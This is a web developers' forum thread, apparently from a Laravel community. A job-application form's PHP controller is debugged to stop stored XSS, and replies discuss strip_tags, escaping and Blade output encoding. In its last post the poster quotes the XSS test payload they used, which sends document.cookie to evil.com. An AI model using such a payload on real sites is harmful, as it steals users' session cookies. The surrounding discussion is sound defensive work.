Level 73
Do you mean render it harmless or remove it completely?
Jul 14, 2023
13
Level 2
How to sanitize HTML & Javascript in form fields ?
Dear Friends, I have a long form for job application and I tried to sanitize it with
use Elegant\Sanitizer\Sanitizer;
I tried like this in code below as in method:
public function AddApplication(Request $request)
{
$validator = Validator::make($request->all(), [
'inputName' => 'required',
'inputPost' => 'required|integer',
'identification_document_type' => 'required',
'email' => 'required|max:255',
'inputPermanent' => 'required',
'inputCommunication' => 'required',
'inputState' => 'required|string',
'inputDistrict' => 'required|string',
'degree_name.*' => 'required',
'universityorboard.*' => 'required',
'subject' => 'required|array',
'subject.*' => 'required',
'course_type.*' => 'required',
'institution' => 'required|array',
'institution.*' => 'required',
'courseduration.*' => 'required',
'percentage.*' => 'required',
'passyear.*' => 'required|max:40',
'upload.*' => 'required|file|mimes:pdf|max:5120',
'course.*' => [
'nullable',
'string',
],
'specialization.*' => [
'nullable',
'string',
],
'institution_additional.*' => [
'nullable',
'string',
],
'upload_additional.*' => 'nullable|file|mimes:pdf|max:2048',
'date_of_expiry.*' => 'nullable|date',
'organization.*' => [
'nullable',
'string',
],
'Designation.*' => [
'nullable',
'string',
],
'jobrole.*' => [
'nullable',
'string',
],
'responsibility.*' => [
'nullable',
'string',
],
'fromdate.*' => [
'nullable',
'date',
],
'todate.*' => [
'nullable',
'date',
],
'uploadworkexperience.*' => 'nullable|mimes:pdf|max:2048', // maximum 2MB per file
'inputPassport' => 'required|image|mimes:jpeg,jpg,png|max:1024',
'identification_document' => 'required|mimes:pdf|max:1024',
'inputSignature' => 'required|image|mimes:jpeg,jpg,png|max:50',
'inputAddlSkill' => 'nullable|string',
'inputAge' => 'nullable|integer|min:18|max:65',
//'inputDOB' => 'required|date_format:Y-m-d|before:today',
'inputDOB' => 'required|date_format:Y-m-d|before:' . now()->subYears(18)->format('Y-m-d'),
'inputGender' => 'required|integer',
'inputMobile' => 'required|integer|digits:10',
'notification_id' => 'required|integer',
], [
'inputDOB.before' => 'You must be at least 18 years old. Please update the Date of Birth field',
'inputAge.min' => 'The input age must be at least 18,please update Date of Birth field',
'inputAge.max' => 'The input age must not be greater than 65,please update Date of Birth field',
'identification_document.required' => 'Please upload an identification document in PDF less than 1 MB',
]);
if ($validator->fails()) {
// Validation failed
$errors = $validator->errors();
$errorMessages = [];
foreach ($errors->messages() as $field => $fieldErrors) {
foreach ($fieldErrors as $errorMessage) {
$errorMessages[] = [
'message' => $errorMessage,
'field' => $field
];
}
}
return response()->json(['errors' => $errorMessages], 400);
} else {
// Validation passed
$sanitizer = new Sanitizer($request->all(), ['trim', 'escape']);
$sanitizedData = $sanitizer->sanitize();
print_r($sanitizedData);
exit();
$post_id = $sanitizedData['inputPost'];
$post_code = $sanitizedData['postCode'];
$post_year = $sanitizedData['postYear'];
// Perform further processing or save the data
//$post_id = $request->input('inputPost');
$app_no = "KSITM-" . $post_code . "/" . $post_year . "/";
$query = ApplicationModel::query();
$query->selectRaw('MAX(app_ref_code) AS max_app_ref_code')
->where('post_id', $post_id);
$results = $query->get();
$app_no_table = $results[0]->max_app_ref_code;
$app_no_table++;
$app_no_save = $app_no . $app_no_table;
//First save in ksitm_applications table with passport photo & signature upload
//$notification_id = $request->input('notification_id');
$notification_id = $sanitizedData['notification_id'];
//$applicant_name = $request->input('inputName');
$applicant_name = $sanitizedData['inputName'];
//$date_of_birth = $request->input('inputDOB');
$date_of_birth = $sanitizedData['inputDOB'];
//$age = $request->input('inputAge');
$age = $sanitizedData['inputAge'];
//$totalExperience = $request->input('totalExperience');
$totalExperience = $sanitizedData['totalExperience'];
//$gender = $request->input('inputGender');
$gender = $sanitizedData['inputGender'];
//$state = $request->input('inputState');
$state = $sanitizedData['inputState'];
//$dist = $request->input('inputDistrict');
$dist = $sanitizedData['inputDistrict'];
//$mobile_no = $request->input('inputMobile');
$mobile_no = $sanitizedData['inputMobile'];
//$email = $request->input('email');
$email = $sanitizedData['email'];
//$identification_document_type = $request->input('identification_document_type');
$identification_document_type = $sanitizedData['identification_document_type'];
//$marital_status = $request->input('inputMarital');
$marital_status = $sanitizedData['inputMarital'];
$permanent_address = $sanitizedData['inputPermanent'];
$communication_address = $sanitizedData['inputCommunication'];
//$additional_skills = $request->input('inputAddlSkill');
$additional_skills = $sanitizedData['inputAddlSkill'];
$app_ref_code = $app_no_table;
$app_year = date("Y");
$app_status = "new";
if ($request->file('inputPassport')) {
//$inputPassport = $request->file('inputPassport');
//$inputPassport = (object) $sanitizer->sanitize('inputPassport');
$inputPassport = $sanitizedData['inputPassport'];
$app_no_save_file = str_replace('/', '-', $app_no_save);
$photoName = $app_no_save_file . '.' . $inputPassport->getClientOriginalExtension();
$location = 'applicant_photo';
$inputPassport->move($location, $photoName);
}
if ($request->file('identification_document')) {
//$identification_document = $request->file('identification_document');
//$identification_document = (object) $sanitizer->sanitize('identification_document');
$identification_document = $sanitizedData['identification_document'];
$app_no_save_file_photoid = str_replace('/', '-', $app_no_save);
$photoidName = $app_no_save_file_photoid . '.' . $identification_document->getClientOriginalExtension();
$location = 'applicant_photo_id';
$identification_document->move($location, $photoidName);
}
if ($request->file('inputSignature')) {
//$inputSignature = $request->file('inputSignature');
//$inputSignature = (object) $sanitizer->sanitize('inputSignature');
$inputSignature = $sanitizedData['inputSignature'];
$app_no_save_file = str_replace('/', '-', $app_no_save); // Replace slashes with hyphens
$signName = $app_no_save_file . '.' . $inputSignature->getClientOriginalExtension();
$location = 'applicant_sign';
$inputSignature->move($location, $signName);
}
$application = new ApplicationModel;
$application->app_no = $app_no_save;
$application->notification_id = $notification_id;
$application->post_id = $post_id;
$application->applicant_name = $applicant_name;
$application->date_of_birth = $date_of_birth;
$application->age = $age;
$application->identification_document = $photoidName;
$application->gender = $gender;
$application->state = $state;
$application->dist = $dist;
$application->mobile_no = $mobile_no;
$application->email = $email;
$application->total_experience = $totalExperience;
$application->identification_document_type = $identification_document_type;
$application->photo = $photoName;
$application->signature = $signName;
$application->marital_status = $marital_status;
$application->permanent_address = $permanent_address;
$application->communication_address = $communication_address;
$application->additional_skills = $additional_skills;
$application->app_ref_code = $app_ref_code;
$application->app_year = $app_year;
$application->app_status = $app_status;
$application->save();
$app_id = $application->id;
$app_no = $application->app_no;
// Store Work Experience Details (if any)
//$organizations = $request->input('organization');
//$organizations = $sanitizer->sanitize('organization');
if (isset($sanitizedData['organization'])) {
$organizations = $sanitizedData['organization'];
}
//$designations = $request->input('Designation');
if (isset($sanitizedData['Designation'])) {
$designations = $sanitizedData['Designation'];
}
if (isset($sanitizedData['jobrole'])) {
$jobroles = $sanitizedData['jobrole'];
}
if (isset($sanitizedData['responsibility'])) {
$responsibilities = $sanitizedData['responsibility'];
}
if (isset($sanitizedData['fromdate'])) {
$fromdates = $sanitizedData['fromdate'];
}
if (isset($sanitizedData['todate'])) {
$todates = $sanitizedData['todate'];
}
if (isset($sanitizedData['uploadworkexperience'])) {
$uploads = $sanitizedData['uploadworkexperience'];
}
if (isset($organizations) && isset($designations) && isset($jobroles) && isset($responsibilities) && isset($fromdates) && isset($todates) && isset($uploads)) {
foreach ($organizations as $key => $organization) {
$WorkExperience = new WorkExperienceModel;
$WorkExperience->app_id = $app_id;
$WorkExperience->exp_organisation = $organization;
$WorkExperience->exp_designation = $designations[$key];
$WorkExperience->exp_job_role = $jobroles[$key];
$WorkExperience->exp_responsibilities = $responsibilities[$key];
$WorkExperience->exp_work_from = $fromdates[$key];
$WorkExperience->exp_work_to = $todates[$key];
// Convert the dates to DateTime objects
$fromDate = new DateTime($fromdates[$key]);
$toDate = new DateTime($todates[$key]);
// Calculate the difference between the two dates
$interval = $fromDate->diff($toDate);
// Extract the difference components
$years = $interval->y;
$months = $interval->m;
$days = $interval->d;
// Output the result
$difference = "$years years $months months $days days";
$WorkExperience->exp_tenure = $difference;
$filename = $uploads[$key]->getClientOriginalName();
if (file_exists(public_path('work_experience') . '/' . $filename)) {
// Get the current timestamp
$timestamp = time();
$exp_certificate = $timestamp . '_' . $filename;
$uploads[$key]->move(public_path('work_experience'), $exp_certificate);
$WorkExperience->exp_certificate = $exp_certificate;
} else {
// The file does not exist, so move it to the destination folder
$uploads[$key]->move(public_path('work_experience'), $filename);
$exp_certificate = $filename;
$WorkExperience->exp_certificate = $exp_certificate;
}
$WorkExperience->save();
}
}
// Educational Qualification
//$degree_names = $request->input('degree_name');
//$degree_names = $sanitizer->sanitize('degree_name');
$degree_names = $sanitizedData['degree_name'];
//$university = $request->input('universityorboard');
$university = $sanitizedData['universityorboard'];
//$subject = $request->input('subject');
$subject = $sanitizedData['subject'];
//$course_type = $request->input('course_type');
$course_type = $sanitizedData['course_type'];
//$institution = $request->input('institution');
$institution = $sanitizedData['institution'];
//$courseduration = $request->input('courseduration');
$courseduration = $sanitizedData['courseduration'];
//$passyear = $request->input('passyear');
$passyear = $sanitizedData['passyear'];
//$percentage = $request->input('percentage');
$percentage = $sanitizedData['percentage'];
//$qlnuploads = $request->file('upload');
$qlnuploads = $sanitizedData['upload'];
if (isset($degree_names)) {
foreach ($degree_names as $key => $degree_name) {
$AppEducation = new AppEducation;
$AppEducation->app_id = $app_id;
$AppEducation->edn_degree = $degree_name;
$AppEducation->edn_subject = $subject[$key];
$AppEducation->edn_course_type = $course_type[$key];
$AppEducation->edn_institution = $institution[$key];
$AppEducation->edn_university = $university[$key];
$AppEducation->edn_course_duration = $courseduration[$key];
$AppEducation->edn_year_passing = $passyear[$key];
$AppEducation->edn_percentage = $percentage[$key];
$certificate = $qlnuploads[$key]->getClientOriginalName();
if (file_exists(public_path('educational_qualification') . '/' . $certificate)) {
// Get the current timestamp
$timestamp = time();
$edn_certificate = implode('_', [$timestamp, $certificate]);
$qlnuploads[$key]->move(public_path('educational_qualification'), $edn_certificate);
$AppEducation->edn_certificate = $edn_certificate;
} else {
// The file does not exist, so move it to the destination folder
$qlnuploads[$key]->move(public_path('educational_qualification'), $certificate);
$edn_certificate = $certificate;
$AppEducation->edn_certificate = $edn_certificate;
}
$AppEducation->save();
}
}
// Addl Qualification details
//$courses = $request->input('course');
if (isset($sanitizedData['course'])) {
$courses = $sanitizedData['course'];
}
//$specialization = $request->input('specialization');
if (isset($sanitizedData['specialization'])) {
$specialization = $sanitizedData['specialization'];
}
//$institution_additional = $request->input('institution_additional');
if (isset($sanitizedData['institution_additional'])) {
$institution_additional = $sanitizedData['institution_additional'];
}
//$date_of_expiry = $request->input('date_of_expiry');
//$date_of_expiry = $sanitizedData['date_of_expiry'];
if (isset($sanitizedData['date_of_expiry'])) {
$date_of_expiry = $sanitizedData['date_of_expiry'];
// Use the $date_of_expiry variable in your code
}
//$upload_additional = $request->file('upload_additional');
if (isset($sanitizedData['upload_additional'])) {
$upload_additional = $sanitizedData['upload_additional'];
}
if (isset($courses) && isset($specialization) && isset($institution_additional) && isset($upload_additional)) {
foreach ($courses as $key => $course) {
$AddlQualification = new AddlQualification;
$AddlQualification->app_id = $app_id;
$AddlQualification->addl_course = $course;
$AddlQualification->addl_specialization = $specialization[$key];
$AddlQualification->addl_institution = $institution_additional[$key];
if (!empty($date_of_expiry[$key])) {
$AddlQualification->addl_date_of_expiary = $date_of_expiry[$key];
} else {
// nothing to do
}
$addl_certificate = $upload_additional[$key]->getClientOriginalName();
if (file_exists(public_path('additional_qualification') . '/' . $addl_certificate)) {
// Get the current timestamp
$timestamp = time();
$addl_certificate = implode('_', [$timestamp, $addl_certificate]);
$upload_additional[$key]->move(public_path('additional_qualification'), $addl_certificate);
$AddlQualification->addl_certificate = $addl_certificate;
} else {
// The file does not exist, so move it to the destination folder
$upload_additional[$key]->move(public_path('additional_qualification'), $addl_certificate);
//$addl_certificate = $certificate;
$AddlQualification->addl_certificate = $addl_certificate;
}
$AddlQualification->save();
}
}
return response()->json(['message' => 'Saved successfully', 'app_no' => $app_no, 'app_id' => $app_id, 'mobile_no' => $mobile_no, 'post_id' => $post_id], 200);
}
}
But still Javascript enter into the database save. How it can prevent ? Please point out the issue of my code.
Waiting your fast reply
Thanks
Anes P A
Level 2
@Tray2 make it harmless as string...
Level 73
@insight That is done by default by laravel before you store it in the database, unless you have disabled it.
Level 2
@Tray2 Then do you please suggest a method to remove it ? because testing team pointed it as an issue..
Level 75
@insight Why don't you use php strip_tags? Do you need the link in the php manual?
Level 2
@jlrdw But on looking that option I found that " No, the strip_tags function in PHP is specifically designed to remove HTML tags from a string. It does not have any effect on JavaScript code or script entries in a form field.
If you want to prevent JavaScript code from being executed when submitting a form, you should handle it on the server-side. When processing the form data, you can validate and sanitize the input to ensure it doesn't contain any potentially malicious code."
I don't think it's work for javascript .
Level 75
@insight it works for javascript, you do it on server side. Give it a try, try to alert:
alert("hello");
Javascript needs the open and closed tags which is stripped.
Level 2
Dear Friends, I got a sanitizer method with a bit change , it works fine But in case of array value with dynamic fields like
<input type="text" name="subject[0]" id="subject2" class="form-control subject" required="">
<input type="text" name="subject[1]" id="subject2" class="form-control subject" required="">
...................................
the sanitization not work for code
$valData=[
'inputName'=> $request->inputName,
'inputAge'=> $request->inputAge,
'inputPermanent'=> $request->inputPermanent,
'inputCommunication'=> $request->inputCommunication,
'inputMobile'=> $request->inputMobile,
'email'=> $request->email,
'subject'=> $request->subject
];
$filters = [
'inputCommunication' => 'trim|escape',
'inputName'=> 'trim|escape',
'inputAge'=> 'trim|escape',
'inputPermanent'=> 'trim|escape',
'inputMobile'=> 'trim|escape',
'email'=> 'trim|escape',
'subject'=> 'trim|escape',
];
$sanitizer = new Sanitizer($valData, $filters);
$valData = $sanitizer->sanitize();
foreach ($valData['subject'] as &$subject) {
$subject = Str::of($subject)->trim()->escape();
}
print_r($valData['subject']);
I got error as
"message": "Method Illuminate\Support\Stringable::escape does not exist.",
"exception": "BadMethodCallException",
any body please advise a method to sanitize array.
Thanks
Anes P A
Level 122
give an example of what is being stored
Level 51
You don't need to sanitize inputs before storing them into database. You need to do that when you adding them into HTML.
PHP has a function to do that called htmlspecialchars which is used by Laravel blade syntax {{ }}.
Blade's
{{ }}echo statements are automatically sent through PHP'shtmlspecialcharsfunction to prevent XSS attacks.
Level 75
You don't need to sanitize inputs before storing them into database.
If an api, you don't have control on how the user is always getting the data. I always strip_tags before storing data. Storing safe data is very good as well. My opinion.
Level 51
@jlrdw I don't do that because no matter what is the case, It's always should be sanitized before adding it into HTML/JavaScript. Even if we do sanitize it before storing into the database, we should still considering a safe way to display it in the front-end.
Level 2
@Yacoubalhaidari Thanks for your reply .... a simple change makes a big goal.. solution is
'subject.*' => 'trim|escape|strip_tags',
Problem solved
@snapey I tried to use insert script for test purpose
<script>alert("sleep");
window.location="http://evil.com/?cookie=" + document.cookie
</script>
Thanks
Anes P A
1 like
Please or to participate in this conversation.